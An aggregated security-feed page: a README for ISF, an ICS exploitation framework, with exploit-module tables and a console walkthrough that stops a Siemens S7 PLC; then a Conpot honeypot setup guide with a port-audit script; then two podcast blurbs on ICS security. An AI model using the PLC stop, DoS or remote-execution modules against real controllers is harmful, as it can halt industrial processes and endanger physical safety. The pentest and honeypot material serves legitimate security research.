ISF – Industrial Control System Exploitation Framework

ISF (Industrial Exploitation Framework) is an exploitation framework based on Python, similar to the Metasploit framework. ISF is based on the open source project routersploit.

ICS Protocol Clients

| Name | Path | Description |
| --- | --- | --- |
| modbus_tcp_client | icssploit/clients/modbus_tcp_client.py | Modbus-TCP Client |
| wdb2_client | icssploit/clients/wdb2_client.py | WdbRPC Version 2 Client (Vxworks 6.x) |
| s7_client | icssploit/clients/s7_client.py | s7comm Client (S7 300/400 PLC) |

Exploit Module

| Name | Path | Description |
| --- | --- | --- |
| s7_300_400_plc_control | exploits/plcs/siemens/s7_300_400_plc_control.py | S7-300/400 PLC start/stop |
| s7_1200_plc_control | exploits/plcs/siemens/s7_1200_plc_control.py | S7-1200 PLC start/stop/reset |
| vxworks_rpc_dos | exploits/plcs/vxworks/vxworks_rpc_dos.py | Vxworks RPC remote dos (CVE-2015-7599) |
| quantum_140_plc_control | exploits/plcs/schneider/quantum_140_plc_control.py | Schneider Quantum 140 series PLC start/stop |
| crash_qnx_inetd_tcp_service | exploits/plcs/qnx/crash_qnx_inetd_tcp_service.py | QNX Inetd TCP service dos |
| qconn_remote_exec | exploits/plcs/qnx/qconn_remote_exec.py | QNX qconn remote code execution |
| profinet_set_ip | exploits/plcs/siemens/profinet_set_ip.py | Profinet DCP device IP config |

Scanner Module

| Name | Path | Description |
| --- | --- | --- |
| profinet_dcp_scan | scanners/profinet_dcp_scan.py | Profinet DCP scanner |
| vxworks_6_scan | scanners/vxworks_6_scan.py | Vxworks 6.x scanner |
| s7comm_scan | scanners/s7comm_scan.py | S7comm scanner |
| enip_scan | scanners/enip_scan.py | EthernetIP scanner |

ICS Protocols Module (Scapy Module)

These protocols can be used in other fuzzing frameworks like Kitty, or to create your own client.

| Name | Path | Description |
| --- | --- | --- |
| pn_dcp | icssploit/protocols/pn_dcp | Profinet DCP Protocol |
| modbus_tcp | icssploit/protocols/modbus_tcp | Modbus TCP Protocol |
| wdbrpc2 | icssploit/protocols/wdbrpc2 | WDB RPC Version 2 Protocol |
| s7comm | icssploit/protocols/s7comm.py | S7comm Protocol |

Install

Python requirements

- gnureadline (OSX only)
- requests
- paramiko
- beautifulsoup4
- pysnmp
- python-nmap
- scapy (we suggest installing scapy manually, following its official documentation)

Install on Kali

    git clone https://github.com/dark-lbp/isf/
    cd isf
    python isf.py

Usage

    root@kali:~/Desktop/temp/isf# python isf.py

                    ICS Exploitation Framework

    Note     : ICSSPOLIT is fork from routersploit at
               https://github.com/reverse-shell/routersploit
    Dev Team : wenzhe zhu(dark-lbp)
    Version  : 0.1.0

    Exploits: 2 Scanners: 0 Creds: 13

    ICS Exploits:
        PLC: 2          ICS Switch: 0
        Software: 0

    isf >

Exploits

    isf > use exploits/plcs/
    exploits/plcs/siemens/  exploits/plcs/vxworks/
    isf > use exploits/plcs/siemens/s7_300_400_plc_control
    exploits/plcs/siemens/s7_300_400_plc_control
    isf > use exploits/plcs/siemens/s7_300_400_plc_control
    isf (S7-300/400 PLC Control) >

You can use the tab key for completion.

Options

Display module options:

    isf (S7-300/400 PLC Control) > show options

    Target options:

       Name       Current settings     Description
       ----       ----------------     -----------
       target                          Target address e.g. 192.168.1.1
       port       102                  Target Port

    Module options:

       Name        Current settings     Description
       ----        ----------------     -----------
       slot        2                    CPU slot number.
       command     1                    Command 0:start plc, 1:stop plc.

    isf (S7-300/400 PLC Control) >

Set options:

    isf (S7-300/400 PLC Control) > set target 192.168.70.210
    [+] {'target': '192.168.70.210'}

Run module:

    isf (S7-300/400 PLC Control) > run
    [*] Running module...
    [+] Target is alive
    [*] Sending packet to target
    [*] Stop plc
    isf (S7-300/400 PLC Control) >

Display information about exploit:

    isf (S7-300/400 PLC Control) > show info

    Name:
    S7-300/400 PLC Control

    Description:
    Use S7comm command to start/stop plc.

    Devices:
    - Siemens S7-300 and S7-400 programmable logic controllers (PLCs)

    Authors:
    - wenzhe zhu

    References:

    isf (S7-300/400 PLC Control) >

Documents

- Modbus-TCP Client usage
- WDBRPCV2 Client usage
- S7comm Client usage
- SNMP_bruteforce usage
- S7 300/400 PLC password bruteforce usage
- Vxworks 6.x Scanner usage
- Profinet DCP Scanner usage
- S7comm PLC Scanner usage
- Profinet DCP Set ip module usage
- Load modules from extra folder
- How to write your own module

Link: http://feedproxy.google.com/~r/PentestTools/~3/oT_vl-DqvbE/isf-industrial-control-system.html

Conpot – An Open Industrial Control Honeypot

Conpot is an ICS honeypot with the goal to collect intelligence about the motives and methods of adversaries targeting industrial control systems.

Documentation

The build of the documentation's source can be found here. There you will also find the instructions on how to install conpot and the FAQ.

Easy install using Docker

Via a pre-built image

1. Install Docker
2. Run docker pull honeynet/conpot
3. Run docker run -it -p 80:80 -p 102:102 -p 502:502 -p 161:161/udp --network=bridge honeynet/conpot:latest /bin/sh
4. Finally run conpot -f --template default
5. Navigate to http://MY_IP_ADDRESS to confirm the setup.

Build docker image from source

1. Install Docker
2. Clone this repo with git clone https://github.com/mushorg/conpot.git and cd conpot/docker
3. Run docker build -t conpot .
4. Run docker run -it -p 80:8800 -p 102:10201 -p 502:5020 -p 161:16100/udp -p 47808:47808/udp -p 623:6230/udp -p 21:2121 -p 69:6969/udp -p 44818:44818 --network=bridge conpot
5. Navigate to http://MY_IP_ADDRESS to confirm the setup.

Build from source and run with docker-compose

1. Install docker-compose
2. Clone this repo with git clone https://github.com/mushorg/conpot.git and cd conpot/docker
3. Build the image with docker-compose build
4. Test if everything is running correctly with docker-compose up
5. Permanently run as a daemon with docker-compose up -d

Sample output:

    # conpot --template default

     Version 0.6.0
     MushMush Foundation

    2018-08-09 19:13:15,085 Initializing Virtual File System at ConpotTempFS/__conpot__ootc_k3j. Source specified : tar://conpot-0.6.0-py3.6/conpot/data.tar
    2018-08-09 19:13:15,100 Please wait while the system copies all specified files
    2018-08-09 19:13:15,172 Fetched x.x.x.x as external ip.
    2018-08-09 19:13:15,175 Found and enabled ('modbus', ) protocol.
    2018-08-09 19:13:15,177 Found and enabled ('s7comm', <conpot.protocols.s7comm.s7_server.S7Server object at 0x7f1af5ad1f60>) protocol.
    2018-08-09 19:13:15,178 Found and enabled ('http', <conpot.protocols.http.web_server.HTTPServer object at 0x7f1af4fc2630>) protocol.
    2018-08-09 19:13:15,179 Found and enabled ('snmp', <conpot.protocols.snmp.snmp_server.SNMPServer object at 0x7f1af4fc2710>) protocol.
    2018-08-09 19:13:15,181 Found and enabled ('bacnet', <conpot.protocols.bacnet.bacnet_server.BacnetServer object at 0x7f1af4fc22e8>) protocol.
    2018-08-09 19:13:15,182 Found and enabled ('ipmi', <conpot.protocols.ipmi.ipmi_server.IpmiServer object at 0x7f1af5aaa1d0>) protocol.
    2018-08-09 19:13:15,185 Found and enabled ('enip', <conpot.protocols.enip.enip_server.EnipServer object at 0x7f1af5aaa0f0>) protocol.
    2018-08-09 19:13:15,199 Found and enabled ('ftp', <conpot.protocols.ftp.ftp_server.FTPServer object at 0x7f1af4fcec18>) protocol.
    2018-08-09 19:13:15,206 Found and enabled ('tftp', <conpot.protocols.tftp.tftp_server.TftpServer object at 0x7f1af4fcef28$) protocol.
    2018-08-09 19:13:15,206 No proxy template found. Service will remain unconfigured/stopped.
    2018-08-09 19:13:15,206 Modbus server started on: ('0.0.0.0', 5020)
    2018-08-09 19:13:15,206 S7Comm server started on: ('0.0.0.0', 10201)
    2018-08-09 19:13:15,207 HTTP server started on: ('0.0.0.0', 8800)
    2018-08-09 19:13:15,402 SNMP server started on: ('0.0.0.0', 16100)
    2018-08-09 19:13:15,403 Bacnet server started on: ('0.0.0.0', 47808)
    2018-08-09 19:13:15,403 IPMI server started on: ('0.0.0.0', 6230)
    2018-08-09 19:13:15,403 handle server PID [23183] running on ('0.0.0.0', 44818)
    2018-08-09 19:13:15,404 handle server PID [23183] responding to external done/disable signal in object 139753672309064
    2018-08-09 19:13:15,404 FTP server started on: ('0.0.0.0', 2121)
    2018-08-09 19:13:15,404 Starting TFTP server at ('0.0.0.0', 6969)
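
One way to extend the "confirm the setup" step from HTTP to every emulated service, as an added example that is not part of the Conpot project: it cross-checks the -p mappings of the build-from-source docker run command against the bind lines in the sample output. The function names and the BROKEN_ARGS mapping are constructed for illustration.

```python
import re

# -p arguments of the build-from-source "docker run" command shown above
PUBLISH_ARGS = ("-p 80:8800 -p 102:10201 -p 502:5020 -p 161:16100/udp "
                "-p 47808:47808/udp -p 623:6230/udp -p 21:2121 "
                "-p 69:6969/udp -p 44818:44818")
# Constructed faulty variant: Modbus mapped to the wrong port, FTP mapping missing
BROKEN_ARGS = PUBLISH_ARGS.replace("502:5020", "502:5021").replace("-p 21:2121 ", "")

# Bind lines from the sample output above (quotes normalised to ASCII)
STARTUP_LOG = """\
2018-08-09 19:13:15,206 Modbus server started on: ('0.0.0.0', 5020)
2018-08-09 19:13:15,206 S7Comm server started on: ('0.0.0.0', 10201)
2018-08-09 19:13:15,207 HTTP server started on: ('0.0.0.0', 8800)
2018-08-09 19:13:15,402 SNMP server started on: ('0.0.0.0', 16100)
2018-08-09 19:13:15,403 Bacnet server started on: ('0.0.0.0', 47808)
2018-08-09 19:13:15,403 IPMI server started on: ('0.0.0.0', 6230)
2018-08-09 19:13:15,403 handle server PID [23183] running on ('0.0.0.0', 44818)
2018-08-09 19:13:15,404 FTP server started on: ('0.0.0.0', 2121)
2018-08-09 19:13:15,404 Starting TFTP server at ('0.0.0.0', 6969)
"""

PUBLISH_RE = re.compile(r"-p\s+(\d+):(\d+)(?:/(tcp|udp))?")
BIND_RE = re.compile(r"^\S+ \S+ (.*?)\s*\('[^']+', (\d+)\)")

def published_ports(args):
    """Map container port -> (host port, protocol) from docker -p arguments."""
    return {int(c): (int(h), proto or "tcp")
            for h, c, proto in PUBLISH_RE.findall(args)}

def listening_ports(log_text):
    """Map container port -> description for each bind line in the startup log."""
    binds = {}
    for line in log_text.splitlines():
        m = BIND_RE.match(line)
        if m:
            binds[int(m.group(2))] = m.group(1).rstrip(": ")
    return binds

def audit(args, log_text):
    """Return (published host ports with no listener, listeners left unpublished).
    Only port numbers are compared; the log does not state TCP or UDP."""
    pub, listen = published_ports(args), listening_ports(log_text)
    dead = {pub[c][0]: c for c in pub if c not in listen}
    hidden = {c: listen[c] for c in listen if c not in pub}
    return dead, hidden

if __name__ == "__main__":
    for label, args in (("page command", PUBLISH_ARGS), ("broken variant", BROKEN_ARGS)):
        dead, hidden = audit(args, STARTUP_LOG)
        print(label, "| dead host ports:", dead, "| unpublished listeners:", hidden)
```

A host port in the first result looks open from outside but reaches nothing, and a listener in the second result collects no traffic, so either one leaves the honeypot blind on that protocol.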

Link: http://feedproxy.google.com/~r/PentestTools/~3/Khos5GRsxrw/conpot-open-industrial-control-honeypot.html

Shodan, Apache, ICS, and Controllers – Paul’s Security Weekly #579

How to use the Shodan search engine to secure an enterprise’s internet presence, Apache access vulnerability could affect thousands of applications, vulnerable controllers could allow attackers to manipulate marine diesel engines, & ICS Security Plagued with Basic, and avoidable mistakes! Paul’s Stories How to use the Shodan search engine to secure an enterprise’s internet presence […]
The post Shodan, Apache, ICS, and Controllers – Paul’s Security Weekly #579 appeared first on Security Weekly.

Link: http://feedproxy.google.com/~r/securityweekly/Lviv/~3/6MbmuPLSPnY/

ICS – Enterprise Security Weekly #102

Paul and Matt review the ICS security landscape, discussing the problems and potential solutions to secure critical infrastructure. We used several on-site interviews and briefings with solutions providers at Blackhat as a basis for this segment. Recorded live at the Security Weekly pool cabana in Las Vegas! Visit http://securityweekly.com/esw for all the latest episodes!
The post ICS – Enterprise Security Weekly #102 appeared first on Security Weekly.

Link: http://feedproxy.google.com/~r/securityweekly/Lviv/~3/EzvhDy8NcSQ/